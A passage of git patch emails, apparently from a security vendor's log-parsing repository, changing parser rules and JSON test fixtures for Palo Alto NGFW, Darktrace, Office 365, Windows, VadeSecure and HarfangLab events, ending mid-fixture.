     "message": "1,2024/10/25 16:10:48,024101010000,SYSTEM,userid,2562,2024/10/25 16:10:48,,connect-ldap-sever,1.2.3.4,0,0,general,informational,\"ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1\",73897065222988700000,0x0,0,0,0,0,,FFFFFF01,0,0,2024-10-25T16:10:48.575+02:00",
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json
index 65221596d..4fb229b1d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "1,2024/10/22 08:54:16,024101011111,SYSTEM,auth,2511,2024/10/22 08:54:17,,auth-success,FFFF,0,0,general,informational,\"When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8\",7389706522298800000,0x0,0,0,0,0,,FWPAN01,0,0,2024-10-22T08:54:17.012+02:0",
     "sekoiaio": {
       "intake": {
         "dialect": "Palo Alto NGFW",
         "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
       }
-    },
-    "message": "1,2024/10/22 08:54:16,024101011111,SYSTEM,auth,2511,2024/10/22 08:54:17,,auth-success,FFFF,0,0,general,informational,\"When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8\",7389706522298800000,0x0,0,0,0,0,,FWPAN01,0,0,2024-10-22T08:54:17.012+02:0"
+    }
   },
   "expected": {
     "message": "1,2024/10/22 08:54:16,024101011111,SYSTEM,auth,2511,2024/10/22 08:54:17,,auth-success,FFFF,0,0,general,informational,\"When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8\",7389706522298800000,0x0,0,0,0,0,,FWPAN01,0,0,2024-10-22T08:54:17.012+02:0",
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json
index 8f64d342d..6c18a16dc 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "1,2024/10/22 09:29:30,024101011111,SYSTEM,auth,2562,2024/10/22 09:29:30,,auth-success,FFFF,0,0,general,informational,\"authenticated for user joe979.   auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.\",738970652229833333,0x0,0,0,0,0,,FFFF01,0,0,2024-10-22T09:29:30.605+02:00",
     "sekoiaio": {
       "intake": {
         "dialect": "Palo Alto NGFW",
         "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
       }
-    },
-    "message": "1,2024/10/22 09:29:30,024101011111,SYSTEM,auth,2562,2024/10/22 09:29:30,,auth-success,FFFF,0,0,general,informational,\"authenticated for user joe979.   auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.\",738970652229833333,0x0,0,0,0,0,,FFFF01,0,0,2024-10-22T09:29:30.605+02:00"
+    }
   },
   "expected": {
     "message": "1,2024/10/22 09:29:30,024101011111,SYSTEM,auth,2562,2024/10/22 09:29:30,,auth-success,FFFF,0,0,general,informational,\"authenticated for user joe979.   auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.\",738970652229833333,0x0,0,0,0,0,,FFFF01,0,0,2024-10-22T09:29:30.605+02:00",

From 972b3d9cdd6a4b021de129530d6b2c5fe698f216 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Wed, 6 Nov 2024 15:45:03 +0100
Subject: [PATCH 203/317] Apply prettier

---
 Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index d09e6e308..2f8b22f2a 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -464,7 +464,7 @@ pipeline:
           AUTHENTICATION_CONSOLE: "authenticated for user '%{USERNAME:user}'.   From: %{IP:src}."
           AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}"
           REASON1: 'User-ID server monitor %{HOSTNAME:hostname}\(%{WORD:vsys}\) %{GREEDYDATA:message}'
-          REASON2: 'ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}'
+          REASON2: "ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}"
           REASON3: "When authenticating user %{WORD:user} from %{IP:source_ip}, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile %{WORD:auth_profile}, vsys %{WORD:vsys}, Server Profile %{WORD:server_profile}, Server Address %{IP:destination_ip}"
           REASON4: "failed authentication for user %{WORD:user}. Reason: %{GREEDYDATA:reason} auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{WORD:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, From: %{IP:source_ip}"
           REASON5: 'authenticated for user %{WORD:user}\.   auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{DATA:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, admin role %{WORD:admin_role}, From: %{IP:source_ip}\.'

From 7038066ee4cf2d2eccace8489e664b58a5e80e55 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Thu, 7 Nov 2024 10:53:40 +0200
Subject: [PATCH 204/317] Fix Darktrace parser

---
 .../ingest/parser.yml                         | 23 +++++-
 .../tests/test_aianalyst_2.json               | 79 +++++++++++++++++++
 .../test_aianalyst_without_log_type.json      | 10 +--
 3 files changed, 101 insertions(+), 11 deletions(-)
 create mode 100644 Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json

diff --git a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
index f28c8ffae..4e77953a5 100644
--- a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
+++ b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
@@ -19,6 +19,8 @@ pipeline:
         output_field: datetime
         format: "%Y-%m-%d %H:%M:%S"
   - name: set_common_fields
+  - name: set_breach_devices_fields
+    filter: "{{json_event.message.breachDevices | length > 0}}"
   - name: set_aianalyst_fields
     filter: "{{json_event.message.log_type == 'aianalyst/incidentevents' or json_event.message.aiaScore != null}}"
   - name: set_modelbreaches_fields
@@ -136,19 +138,32 @@ stages:
             {%- endif -%}
             {{filters}}
 
-  set_aianalyst_fields:
+  set_breach_devices_fields:
     actions:
       - set:
           device.id: "{{json_event.message.breachDevices[0].did}}"
           event.action: "{{json_event.message.breachDevices[0].title}}"
-          host.hostname: "{{json_event.message.breachDevices[0].hostname}}"
           host.id: "{{json_event.message.breachDevices[0].did}}"
           host.mac: "{{json_event.message.breachDevices[0].mac}}"
+
+      - set:
+          host.hostname: "{{json_event.message.breachDevices[0].hostname}}"
+        filter: '{{not json_event.message.breachDevices[0].hostname.startswith("SaaS::")}}'
+
+      - set:
           host.name: "{{json_event.message.breachDevices[0].identifier}}"
-        filter: "{{json_event.message.breachDevices | length > 0}}"
+        filter: '{{not json_event.message.breachDevices[0].identifier.startswith("SaaS::")}}'
+
+      - set:
+          user.email: "{{json_event.message.breachDevices[0].hostname.split()[-1]}}"
+        filter: '{{json_event.message.breachDevices[0].hostname.startswith("SaaS::") and "@" in json_event.message.breachDevices[0].hostname.split()[-1]}}'
+
       - set:
           host.ip: "{{json_event.message.breachDevices[0].ip}}"
-        filter: "{{json_event.message.breachDevices | length > 0 and (json_event.message.breachDevices[0].ip | is_ipaddress)}}"
+        filter: "{{json_event.message.breachDevices[0].ip | is_ipaddress}}"
+
+  set_aianalyst_fields:
+    actions:
       - set:
           event.kind: "alert"
           event.category: "threat"
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json
new file mode 100644
index 000000000..ebf8a69eb
--- /dev/null
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json
@@ -0,0 +1,79 @@
+{
+  "input": {
+    "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}"
+  },
+  "expected": {
+    "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}",
+    "event": {
+      "category": "threat",
+      "kind": "alert",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-27T10:02:28.884000Z",
+    "darktrace": {
+      "threat_visualizer": {
+        "acknowledged": false,
+        "activityId": "da39a3ee",
+        "aiaScore": 93.67343783378601,
+        "attackPhases": [
+          3
+        ],
+        "breachDevices": [
+          {
+            "did": 3820,
+            "hostname": "SaaS::Zoom: john.doe@example.com",
+            "identifier": "SaaS::Zoom: john.doe@example.com",
+            "ip": null,
+            "mac": null,
+            "sid": -9,
+            "subnet": null
+          }
+        ],
+        "category": "critical",
+        "children": [
+          "204a3642-a6f1-4ac3-85d0-add7dd0c9f9b"
+        ],
+        "currentGroup": "g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b",
+        "externalTriggered": false,
+        "groupCategory": "critical",
+        "groupScore": 21.063004966718992,
+        "groupingIds": [
+          "3d2a2fc6"
+        ],
+        "mitreTactics": [
+          "privilege-escalation"
+        ],
+        "periods": [
+          {
+            "end": 1730023230000,
+            "start": 1730023230000
+          }
+        ],
+        "relatedBreaches": [
+          {
+            "modelName": "SaaS / Access / Unusual External Source for SaaS Credential Use",
+            "pbid": 46769,
+            "threatScore": 63.0,
+            "timestamp": 1730023232000
+          }
+        ],
+        "userTriggered": false
+      }
+    },
+    "device": {
+      "id": "3820"
+    },
+    "host": {
+      "id": "3820"
+    },
+    "observer": {
+      "name": "Darktrace",
+      "product": "Threat visualizer"
+    },
+    "user": {
+      "email": "john.doe@example.com"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json
index 3ba5ae570..b64c616de 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json
@@ -66,18 +66,14 @@
       "id": "2635"
     },
     "host": {
-      "hostname": "SaaS::AzureActiveDirectory: test@test.fr",
-      "id": "2635",
-      "name": "SaaS::AzureActiveDirectory: test@test.fr"
+      "id": "2635"
     },
     "observer": {
       "name": "Darktrace",
       "product": "Threat visualizer"
     },
-    "related": {
-      "hosts": [
-        "SaaS::AzureActiveDirectory: test@test.fr"
-      ]
+    "user": {
+      "email": "test@test.fr"
     }
   }
 }
\ No newline at end of file

From 880d24a71d5a4d57880fca0044b6f5452506dfb9 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Thu, 7 Nov 2024 11:40:45 +0200
Subject: [PATCH 205/317] Fix empty host.ip

---
 .../ingest/parser.yml                         | 20 +++++++++----------
 .../tests/test_anomalous_file.json            |  6 +-----
 .../test_device_attack_and_recon_tools.json   |  6 +-----
 .../test_device_request_watched_domain.json   |  6 +-----
 4 files changed, 12 insertions(+), 26 deletions(-)

diff --git a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
index 4e77953a5..92a2d9ef2 100644
--- a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
+++ b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
@@ -54,17 +54,15 @@ stages:
           observer.name: "Darktrace"
           observer.product: "Threat visualizer"
           host.ip: >
-            {% if json_event.message.device.ips is not in [[], Null]%}
-            [
-              {% for ip in json_event.message.device.ips %}
-              {% if ip.get("ip") %}
-              {% if ip["ip"] | is_ipaddress %}
-              '{{ip["ip"]}}',
-              {% endif %}
-              {% endif %}
-              {% endfor %}
-            ]
-            {% endif %}
+            {%- set host_ips = [] -%}
+            {%- for ip in json_event.message.device.ips -%}
+              {%- if ip.get("ip") | is_ipaddress -%}
+                {%- set host_ips = host_ips.append(ip["ip"]) -%}
+              {%- endif -%}
+            {%- endfor -%}
+            {%- if host_ips | length > 0 -%}
+              {{ host_ips }}
+            {%- endif -%}
 
   set_modelbreaches_fields:
     actions:
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json
index 781d6cce6..49512bdeb 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json
@@ -158,15 +158,11 @@
       }
     },
     "host": {
-      "id": "16",
-      "ip": []
+      "id": "16"
     },
     "observer": {
       "name": "Darktrace",
       "product": "Threat visualizer"
-    },
-    "related": {
-      "ip": []
     }
   }
 }
\ No newline at end of file
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json
index 90d9307b3..5092ebe13 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json
@@ -118,15 +118,11 @@
       }
     },
     "host": {
-      "id": "16",
-      "ip": []
+      "id": "16"
     },
     "observer": {
       "name": "Darktrace",
       "product": "Threat visualizer"
-    },
-    "related": {
-      "ip": []
     }
   }
 }
\ No newline at end of file
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json
index 9ae53b161..7866f9581 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json
@@ -114,16 +114,12 @@
       }
     },
     "host": {
-      "id": "6",
-      "ip": []
+      "id": "6"
     },
     "observer": {
       "name": "Darktrace",
       "product": "Threat visualizer"
     },
-    "related": {
-      "ip": []
-    },
     "service": {
       "name": "Slack"
     },

From 4d63741595f95d292e5454a4a5ce65b030613ae8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?=
 <129874202+gcl-sekoia@users.noreply.github.com>
Date: Thu, 7 Nov 2024 16:01:35 +0100
Subject: [PATCH 206/317] fix(o365): Parse ClientAppId in Exchange events

---
 Office 365/o365/ingest/parser.yml               | 7 +++++++
 Office 365/o365/tests/clientipadress.json       | 5 +++++
 Office 365/o365/tests/exchange_item_update.json | 5 +++++
 Office 365/o365/tests/inbox_rule.json           | 5 ++++-
 4 files changed, 21 insertions(+), 1 deletion(-)

diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 62a4098df..13036065f 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -164,6 +164,10 @@ stages:
         filter: '{{json_event.message.get("Parameters") != None}}'
       - set:
           office365.context.aad_session_id: "{{json_event.message.SessionId}}"
+          office365.context.client.id: "{{json_event.message.ClientAppId}}"
+      - set:
+          office365.context.client.id: "{{json_event.message.AppId}}"
+        filter: '{{json_event.message.get("ClientAppId") == ""}}'
 
   parse_exchange_item:
     actions:
@@ -189,6 +193,7 @@ stages:
           user.id: "{{json_event.message.LogonUserSid}}"
           office365.exchange.mailbox_guid: "{{json_event.message.MailboxGuid}}"
           office365.context.aad_session_id: "{{json_event.message.SessionId}}"
+          office365.context.client.id: "{{json_event.message.ClientAppId}}"
       - set:
           email.subject: "{{json_event.message.Item.Subject}}"
           email.message_id: "{{json_event.message.Item.InternetMessageId[1:-1]}}"
@@ -237,6 +242,7 @@ stages:
             ]
       - set:
           office365.context.aad_session_id: "{{json_event.message.SessionId}}"
+          office365.context.client.id: "{{json_event.message.ClientAppId}}"
   parse_share_point:
     actions:
       - set:
@@ -254,6 +260,7 @@ stages:
     actions:
       - set:
           office365.context.aad_session_id: "{{json_event.message.SessionId}}"
+          office365.context.client.id: "{{json_event.message.ClientAppId}}"
 
   parse_network_traffic:
     actions:
diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json
index c20107759..6f5c9ac9d 100644
--- a/Office 365/o365/tests/clientipadress.json	
+++ b/Office 365/o365/tests/clientipadress.json	
@@ -23,6 +23,11 @@
       "target": "user"
     },
     "office365": {
+      "context": {
+        "client": {
+          "id": "clientappidxxxx-xxx-xxx-xxxx"
+        }
+      },
       "record_type": 50,
       "result_status": "Succeeded",
       "user_type": {
diff --git a/Office 365/o365/tests/exchange_item_update.json b/Office 365/o365/tests/exchange_item_update.json
index ad69be989..30682248f 100644
--- a/Office 365/o365/tests/exchange_item_update.json	
+++ b/Office 365/o365/tests/exchange_item_update.json	
@@ -29,6 +29,11 @@
       "subject": "HI"
     },
     "office365": {
+      "context": {
+        "client": {
+          "id": "037fd006-a72b-49ae-4bb0-08dba30c8729"
+        }
+      },
       "exchange": {
         "mailbox_guid": "8208550a-4001-439d-a9f6-e95d76767507"
       },
diff --git a/Office 365/o365/tests/inbox_rule.json b/Office 365/o365/tests/inbox_rule.json
index 8af518085..f3609c050 100644
--- a/Office 365/o365/tests/inbox_rule.json	
+++ b/Office 365/o365/tests/inbox_rule.json	
@@ -21,7 +21,10 @@
         "object_id": "EURPR07A010.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/example.onmicrosoft.com/bc1b1df3-f861-4aec-bf7c-40ce5b5566c1\\RULE_NAME"
       },
       "context": {
-        "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847"
+        "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847",
+        "client": {
+          "id": "00000002-0000-0ff1-ce00-000000000000"
+        }
       },
       "exchange_admin": {
         "parameters": [

From 1722cb45207026aa7f8802b095f9ffb60f25f7b7 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Fri, 8 Nov 2024 09:18:29 +0200
Subject: [PATCH 207/317] Fix windows

---
 Windows/windows/ingest/parser.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 5fc6b2eec..e21ec0b94 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -24,6 +24,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{json.event.Message}}"
         output_field: result
         value_sep: ":"

From 5108adaff0f103cfa4a6e28e6c191fc80ae21c4c Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Fri, 8 Nov 2024 12:19:44 +0200
Subject: [PATCH 208/317] Fix connector UUID

---
 VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml
index da4658b6a..49acafa59 100644
--- a/VadeSecure/vade_secure_m365/_meta/manifest.yml
+++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml
@@ -1,7 +1,7 @@
 uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232
 name: Vade for M365
 slug: vade-m365
-automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616
+automation_connector_uuid: d3860745-4433-4690-b025-378369ad7201
 automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff
 description: >-
   Vade for M365 offers all protections from Vade to our Microsoft 365 Email service

From 60131a16889905c6cb7b1fd2044d4ad5ab89bfea Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Fri, 8 Nov 2024 13:48:57 +0200
Subject: [PATCH 209/317] HarfangLab - fix ip parsing

---
 HarfangLab/harfanglab/ingest/parser.yml       |   5 +-
 .../harfanglab/tests/authentication_2.json    | 103 ++++++++++++++++++
 2 files changed, 107 insertions(+), 1 deletion(-)
 create mode 100644 HarfangLab/harfanglab/tests/authentication_2.json

diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 7ff16f6df..1376e0758 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -277,7 +277,6 @@ stages:
           event.type: ["info"]
           event.provider: "{{json_event.message.source_name}}"
           event.code: "{{json_event.message.event_id|string}}"
-          source.ip: "{{json_event.message.event_data.IpAddress}}"
           action.id: "{{json_event.message.event_id}}"
           user.name: "{{json_event.message.event_data.SubjectUserName}}"
           user.domain: "{{json_event.message.event_data.SubjectDomainName}}"
@@ -475,6 +474,10 @@ stages:
           action.properties.TaskContentNew_Command: "{{parse_task_info.message.Task.Actions.Exec.Command}}"
           action.properties.TaskContentNew_Args: "{{parse_task_info.message.Task.Actions.Exec.Arguments}}"
 
+      - set:
+          source.ip: "{{json_event.message.event_data.IpAddress}}"
+        filter: "{{json_event.message.event_data.IpAddress | is_ipaddress}}"
+
   authentication_info:
     actions:
       - set:
diff --git a/HarfangLab/harfanglab/tests/authentication_2.json b/HarfangLab/harfanglab/tests/authentication_2.json
new file mode 100644
index 000000000..0f5d169e9
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/authentication_2.json
@@ -0,0 +1,103 @@
+{
+  "input": {
+    "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, 